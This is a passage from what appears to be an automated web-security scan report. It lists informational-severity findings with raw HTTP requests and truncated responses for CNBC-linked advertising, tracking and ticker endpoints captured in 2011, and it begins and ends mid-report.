Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1157
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:04 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

29.51. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

Summary

Severity: Information
Confidence: Certain
Host: http://tag.admeld.com
Path: /ad/iframe/677/cnbc/728x90/atf

Request

GET /ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1147
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:38 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...

29.52. http://tf.nexac.com/media/1809966/na.html

Summary

Severity: Information
Confidence: Certain
Host: http://tf.nexac.com
Path: /media/1809966/na.html

Request

GET /media/1809966/na.html HTTP/1.1
Host: tf.nexac.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
Date: Tue, 06 Sep 2011 14:59:05 GMT
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public
Content-Type: text/html
Content-Length: 762
Connection: keep-alive

<script type="text/javascript">

function getNaID() {
var cookieName = "na_id";
var nextacCookie = "" + document.cookie;
var startIndex = nextacCookie.indexOf(cookieName);
if (startIndex != -1)
...[SNIP]...

29.53. http://ticker.cnbc.com/

Summary

Severity: Information
Confidence: Certain
Host: http://ticker.cnbc.com
Path: /

Request

GET / HTTP/1.1
Host: ticker.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 04 Dec 2006 02:08:57 GMT
ETag: "32-423bdd50c8040"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/html
Expires: Tue, 06 Sep 2011 15:05:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:05:59 GMT
Connection: close
Set-Cookie: pers_cookie_insert_prod_ticker_srvrs_80=532795968.20480.0000; expires=Tue, 06-Sep-2011 18:05:59 GMT; path=/

<script>
window.location="/main.do";
</script>

29.54. http://tps31.doubleverify.com/visit.js

Summary

Severity: Information
Confidence: Certain
Host: http://tps31.doubleverify.com
Path: /visit.js

Request

GET /visit.js?ctx=1135557&cmp=1135559&advid=1135558&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1398295&sid=interclk&adid=&&num=275&srcurl=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&curl=&qpgid=&referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339024254%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252F HTTP/1.1
Host: tps31.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:24 GMT
Connection: close
Content-Length: 27

The service is unavailable.

29.55. http://uac.advertising.com/wrapper/aceUACping.htm

Summary

Severity: Information
Confidence: Certain
Host: http://uac.advertising.com
Path: /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Tue, 06 Sep 2011 15:42:49 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:16:04 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

29.56. http://videometa.cnbc.com/getadmincontent.do

Summary

Severity: Information
Confidence: Certain
Host: http://videometa.cnbc.com
Path: /getadmincontent.do

Request

GET /getadmincontent.do HTTP/1.1
Host: videometa.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Server: aicache6x
Expires: Tue, 06 Sep 2011 15:06:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:06:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132

<html><title>503 Service temporarily not available</title><body><h1>503 Service not available</h1><hr /><p>aiCache</p></body></html>

29.57. http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /BVK/iview/349019750/direct/01/8665855478

Request

GET /BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,8665855478,768033^1069543^1184^0,1_/xsxdata=$XSXDATA/bnum=12485207/optn=64?trg= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:46:48 GMT
Connection: close
Content-Length: 590

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/225567817/349019750/direct/01" onclick="(new Image).src='http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=00010695
...[SNIP]...

29.58. http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/1049994

Request

GET /FXM/iview/308880957/direct/01/1049994?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:49:15 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.59. http://view.atdmt.com/FXM/iview/308880957/direct/01/466318

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/466318

Request

GET /FXM/iview/308880957/direct/01/466318?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:04:29 GMT
Connection: close
Content-Length: 741

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/90077638/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B
...[SNIP]...

29.60. http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/5096911

Request

GET /FXM/iview/308880957/direct/01/5096911?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:02:41 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.61. http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/5912867

Request

GET /FXM/iview/308880957/direct/01/5912867?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:03:37 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.62. http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/6197540

Request

GET /FXM/iview/308880957/direct/01/6197540?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:28:57 GMT
Connection: close
Content-Length: 740

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/90077638/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B
...[SNIP]...

29.63. http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/7067761

Request

GET /FXM/iview/308880957/direct/01/7067761?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 14:56:39 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.64. http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/7533182

Request

GET /FXM/iview/308880957/direct/01/7533182?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:04:49 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.65. http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /FXM/iview/308880957/direct/01/7760164

Request

GET /FXM/iview/308880957/direct/01/7760164?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41492779/41510566/1%3B%3B%7Eokv%3D%3Bsite%3Dcnbc%3Bsect%3Dhome%3Bsub%3Dhomeus%3Bpageid%3D15839285%3B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:34:06 GMT
Connection: close
Content-Length: 743

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/132592147/308880957/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3
...[SNIP]...

29.66. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

Summary

Severity: Information
Confidence: Certain
Host: http://view.atdmt.com
Path: /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:32:14 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...

29.67. http://wd.sharethis.com/api/getCount2.php

Summary

Severity: Information
Confidence: Certain
Host: http://wd.sharethis.com
Path: /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 250

(function(){stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm
...[SNIP]...

29.68. http://www.bigcommerce.com/freetrial.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.bigcommerce.com
Path: /freetrial.php

Request

GET /freetrial.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 10579
Connection: close
Content-Type: text/html

<style>

.FreeTrialForm { background:#FFF !important; border:1px solid transparent !important; }
.FreeTrialForm p { color:black !important; }
.NoCCRequired { color:gray !important; font-weight:bold; }
...[SNIP]...

29.69. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.bigcommerce.com
Path: /lp/e1-lp-ecommerce.php

Request

GET /lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q HTTP/1.1
